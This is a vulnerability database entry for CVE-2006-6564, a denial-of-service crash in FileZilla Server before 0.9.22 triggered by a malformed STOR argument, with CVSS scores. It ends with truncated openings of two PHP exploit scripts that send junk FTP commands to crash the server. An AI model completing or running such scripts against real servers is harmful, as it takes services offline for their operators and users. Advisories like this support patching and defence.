CVE-2006-6564

Published: 15/12/2006 Updated: 29/07/2017
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
VMScore: 410
Vector: AV:N/AC:L/Au:S/C:N/I:N/A:P

Vulnerability Summary

FileZilla Server prior to 0.9.22 allows remote malicious users to cause a denial of service (crash) via a malformed argument to the STOR command, which results in a NULL pointer dereference. NOTE: CVE analysis suggests that the problem might be due to a malformed PORT command.

Vulnerable Product

filezilla filezilla

Exploits

<?php # Filezilla FTP Server 0920 beta / 0921 "STOR" Denial Of Service # by rgod # mail: retrog at alice dot it # site: retrogodaltervistaorg # tested on WinXP sp2 error_reporting(E_ALL); $service_port = getservbyname('ftp', 'tcp'); $address = gethostbyname('19216813'); $user="test"; $pass="test"; $junk="///sun-tzu/ ...
<?php # Filezilla FTP Server 0920 beta / 0921 "LIST", "NLST" and "NLST -al" Denial Of Service # by shinnai # mail: shinnai[at]autistici[dot[org] # site: shinnaialtervistaorg # # special thanks to rgod for his first advisory about "STOR" Denial of service, see: retrogodaltervistaorg/filezilla_0921_doshtml # and for code in ...